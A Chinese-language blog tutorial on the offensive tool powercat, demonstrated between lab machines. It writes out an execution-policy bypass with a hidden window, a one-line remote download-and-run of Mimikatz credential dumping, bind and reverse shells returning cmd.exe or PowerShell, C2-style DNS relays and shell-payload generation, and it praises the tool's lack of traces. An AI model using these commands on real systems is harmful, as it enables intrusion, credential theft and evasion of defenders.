powercat工具詳細分析

這個工具出來兩年了，但是好像很少人知道他。國外的大牛們用的比較多，國內的文章出現powercat關鍵字的寥寥無幾，更別說有這款工具的詳細用法了。

0x01 powercat簡介

是NetCat 的Powershell 版本。作者的介紹也是這樣寫的，但是我覺得，powercat不管怎麼樣，也有比NetCat 強的一點，就是沒有任何痕迹！來無影去無蹤。關掉powershell 我們還是好朋友。

0x02 下載運行

地址:github地址鏈接

直接克隆回本地:

git clone https://github.com/besimorhino/powercat.git

你直接執行的話是肯定執行不了的，因為你沒有許可權

導入也導入不了，執行也執行不了。正常

Restricted------默認的設置，不允許任何script運行

AllSigned-------只能運行經過數字證書籤名的script

RemoteSigned----運行本地的script不需要數字簽名，但是運行從網路上下載的script就必須要有數字簽名

Unrestricted----允許所有的script運行

本地許可權繞過

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

本地隱藏許可權繞過執行腳本

PowerShell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -WindowStyle Hidden(隱藏窗口) -File xxx.ps1

用IEX下載遠程PS1腳本回來許可權繞過執行

powershell "IEX (New-Object Net.WebClient).DownloadString( http://is.gd/oeoFuI );Invoke-Mimikatz-DumpCreds"

IEX (New-Object System.Net.Webclient).DownloadString( https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 )

可以看到Powercat已經成功執行了

0x03powercat基本操作

powercat 到底還是netcat的翻版，他們操作起來非常相似，我就不貼一堆命令，然後貼中文注釋了，因為我的英文水平還停留在小學六年級的樣子。大家需要的話自行google

powercat因為是netcat 的翻版，所以他們兩個連接起來沒有任何的問題，先來建立起一個簡單的Socket 通信看看樣子，總感覺很牛的樣子

簡單的socket通信

在kali 下用netcat來執行命令

netcat -l -p 8888 -vv

在Windows 測試機下執行powrcat 命令

powercat -c 192.168.12.101 -p 8888 -v

執行完這兩道命令，kali 跟windows已經建立了一個基本的socket回話了,相當於一個聊天窗口，企鵝的功能，在悄悄秀一波英文水平,沒騙你們，真的只會這一句

powercat命令解析

-c 指定一個ip地址-p 指定一個埠-v 顯示詳情

這是一個基本的socket 通信，相信會擼代碼的同學都可以輕鬆寫出這樣的代碼

一個基本的socket通信是沒有可能滿足我們的。繼續深入

正向鏈接

在windows主機下執行：

powercat -l -p 8888 -e cmd.exe -v

在kali下用Netcat執行:

netcat -vv 192.168.12.109 8888

成功返回換一個cmd命令行

powercat命令解析

-l 監聽模式，用於入站鏈接-p 本地埠號-e 程序重定向，跟nc一毛一樣-v 顯示詳情

反向鏈接

kali下執行：

netcat -l -p 8888 -v

windows主機下執行:

powercat -c 192.168.12.101 -p 8888 -e cmd.exe

成功反向鏈接回來

來個牛的

上面可以跟nc配合,但是nc沒有辦法返回powershell,powershell就是在滲透過程中的一把利刃，而powercat剛剛好可以返回一個powershell

兩台windows測試機的ip分別是192.168.12.108,192.168.12.109

在ip為192.168.12.109的機器上執行：

powercat -l -p 9999 -v

在另一台上執行:

powercat -c 192.168.12.109 -p 9999 -ep

powercat命令解析

-eq 返回powershell

0x04 Powercat其他操作

文件上傳

這個不用說，基本這種連接的都支持

在c:下新建一個test.txt的文件，寫入hello word!

在有text.txt的機器執行:

powercat -c 192.168.12.108 -p 9999 -i c:test.txt -v

另一台機器執行

powercat -l -p 9999 -of c:test.txt -v

我建議在這裡加上-v參數，要不我們不知道文件有沒有上傳完，當上傳完成的時候，直接Ctrl+c關閉連接，如果不關閉，可以繼續向文件中寫入文件

這裡並沒有直接結束掉，而是又寫入了一些文件,來看看在靶機中到底寫入了什麼

powercat命令解析

-i 指定要上傳文件的絕對路徑

-of 接受文件的路徑以及名稱

中繼

這個功能也是基本都有的功能,不做演示，個人覺得用的不多，當然，做跳板另當別論。直接貼上官方的代碼(藉助google翻譯):

TCP偵聽器到TCP客戶端中繼：

powercat -l -p 8000 -r tcp：10.1.1.16：443

TCP偵聽器到UDP客戶端中繼：

powercat -l -p 8000 -r udp：10.1.1.16：53

TCP偵聽器到DNS客戶端中繼

powercat -l -p 8000 -r dns：10.1.1.1：53：c2.example.com

TCP偵聽器使用Windows默認DNS伺服器到DNS客戶端中繼

powercat -l -p 8000 -r dns ::: c2.example.com

TCP客戶端到客戶端中繼

powercat -c 10.1.1.1 -p 9000 -r tcp：10.1.1.16：443

TCP偵聽器到偵聽器中繼

powercat -l -p 8000 -r tcp：9000

類似MSF的回彈功能

powercat這個回彈很牛，可正向可反向。

powercat -c 192.168.12.109 -p 9999 -e cmd -g

生成一個反向鏈接的payload，可以鏈接到192.168.12.109的9999埠,這條命令之後是這個樣子的= =

這是powershell腳本,保存為.ps1的格式，運行吧

正向連接馬:

powercat -l -p 8000 -e cmd -ge

用法，沒有嘗試，應該與Empire的payload相似.

說句我的看法，個人覺得不是很實用，如果是你，有了這樣的機會，你會選擇用Powercat嗎？要我，我直接上Metasploit,Empire了。

0x05 總結

Powercat的大部分功能都是可以用其他工具代替的，但是，不管怎麼說，都是一種思路。他的存在肯定有他的意義，要不作者也不會無聊開發出這樣的工具來。講句心裡話，我最看好他執行過後什麼都不會留下。

點擊展開全文

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！